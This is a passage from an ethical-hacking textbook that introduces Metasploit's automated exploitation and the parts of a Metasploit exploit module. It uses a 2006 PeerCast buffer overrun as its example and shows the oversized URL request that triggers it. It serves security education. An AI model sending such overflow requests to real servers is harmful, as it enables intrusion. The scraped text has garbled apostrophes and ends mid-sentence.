If you??™re anxious to
play with db_autopwn and you don??™t have or don??™t want to use the Backtrack CD, you can
find a summary of the setup steps at http://blog.metasploit.com/2006/09/metasploit-30-
automated-exploitation.html.
Inside Metasploit Modules
We??™ll be using Metasploit in later chapters as an exploit development platform. While
we??™re here, let??™s preview the content of one of the simpler Metasploit exploit modules.
PeerCast is a peer-to-peer Internet broadcast platform which, unfortunately, was vulnerable
to a buffer overrun in March 2006. The PeerCast Streaming server did not properly
handle a request of the form:
http://localhost:7144/stream/?AAAAAAAAAAAAAAAAAAAAAAA....(800)
You can find the Metasploit exploit module for this vulnerability in your Metasploit
installation directory under framework\modules\exploits\linux\http\peercast_url.rb.
Each Metasploit exploit only needs to implement the specific code to trigger the vulnerability.
All the payload integration and the network connection and all lower-level
moving parts are handled by the framework. Exploit modules will typically include
??? Name of the exploit and the modules from which it imports or inherits
functionality
??? Metadata such as name, description, vulnerability reference information,
and so on
??? Payload information such as number of bytes allowed, characters not allowed
??? Target types and any version-specific return address information
Gray Hat Hacking: The Ethical Hacker??™s Handbook
98
??? Default transport options such as ports or pipe names
??? Ruby code implementing the vulnerability trigger
The peercast_url.
Pages:
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239